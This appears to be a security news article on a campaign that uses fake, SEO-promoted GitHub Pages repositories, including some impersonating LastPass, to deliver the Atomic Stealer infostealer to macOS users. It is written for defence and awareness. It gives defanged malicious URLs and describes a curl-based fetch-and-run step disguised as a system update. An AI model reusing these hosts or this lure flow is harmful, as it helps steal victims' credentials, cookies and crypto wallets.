A recent cyber-attack campaign has been identified, exploiting GitHub Pages to distribute the Atomic Stealer (AMOS) malware to macOS users. This operation employs advanced Search Engine Optimization (SEO) techniques to position malicious repositories prominently in search results on platforms like Google and Bing. The primary targets are individuals seeking legitimate software from reputable technology companies, financial institutions, and password management services.
Attack Methodology
The attackers have developed a multi-layered strategy:
1. Creation of Deceptive GitHub Repositories: Cybercriminals establish fraudulent GitHub repositories that mimic official software distributors. These repositories are designed to appear legitimate, often replicating the branding and content of the original software providers.
2. SEO Manipulation: By leveraging SEO techniques, these malicious repositories are elevated to the top of search engine results. This increases the likelihood of users encountering them when searching for specific applications.
3. Redirection to Malicious Sites: Upon visiting these deceptive GitHub Pages, users are presented with links such as Install [Company] on MacBook. Clicking these links redirects them to secondary staging sites that further the illusion of legitimacy.
Case Study: LastPass Impersonation
The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team uncovered this threat after identifying two fraudulent repositories targeting their customers. Both repositories were created by a user named modhopmduck476 on September 16, 2025.
– Redirection Process: Victims searching for LastPass were led to a GitHub Page that redirected them to a URL resembling LastPass’s official site: `hxxps://ahoastock825[.]github[.]io/.github/lastpass`. This page then forwarded users to another site: `macprograms-pro[.]com/mac-git-2-download.html`.
– Execution of Malicious Commands: The secondary site instructed users to execute a terminal command that performed a CURL request to a base64-encoded URL. This URL resolved to `bonoud[.]com/get3/install.sh`, downloading the malicious payload disguised as a system Update to the temporary directory.
Atomic Stealer Malware Overview
Atomic Stealer, also known as AMOS, is a sophisticated information-stealing malware specifically designed for macOS environments. Active since April 2023, it possesses the capability to harvest a wide range of sensitive data, including:
– Passwords: Extracts credentials stored in browsers and system keychains.
– Browser Cookies: Collects cookies that can be used to hijack active sessions.
– Cryptocurrency Wallet Information: Targets various cryptocurrency wallets to steal funds.
– System Credentials: Gathers system-related information that can be exploited for further attacks.
Once installed, Atomic Stealer establishes persistence on the infected system and communicates with command-and-control (C2) servers to exfiltrate the stolen data.
Operational Resilience of Threat Actors
The cybercriminals behind this campaign have demonstrated significant adaptability:
– Multiple GitHub Usernames: To evade detection and takedown efforts, the attackers create multiple GitHub accounts. This distributed approach ensures the continuity of their malicious infrastructure even when individual repositories are reported and removed.
– Broader Targeting: Beyond LastPass, similar attacks have been identified targeting various technology companies and financial institutions, indicating a widespread and coordinated effort.
Recommendations for macOS Users
To mitigate the risk of such attacks, macOS users are advised to:
1. Exercise Caution with Search Results: Be wary of downloading software directly from search engine results. Always verify the authenticity of the source before proceeding.
2. Verify Repository Authenticity: Before executing terminal commands or installing applications, ensure that the repository is legitimate. Check for official documentation and cross-reference with the official website.
3. Stay Updated: Regularly update your operating system and software to benefit from the latest security patches.
4. Use Security Solutions: Employ reputable security software that can detect and prevent malware infections.
5. Educate Yourself: Stay informed about the latest cyber threats targeting macOS users. Knowledge is a crucial defense against social engineering attacks.
Conclusion
This campaign underscores the evolving tactics of cybercriminals who exploit trusted platforms like GitHub to distribute malware. By leveraging SEO techniques and creating deceptive repositories, they increase the likelihood of compromising unsuspecting users. Vigilance, verification, and adherence to cybersecurity best practices are essential in mitigating such threats.
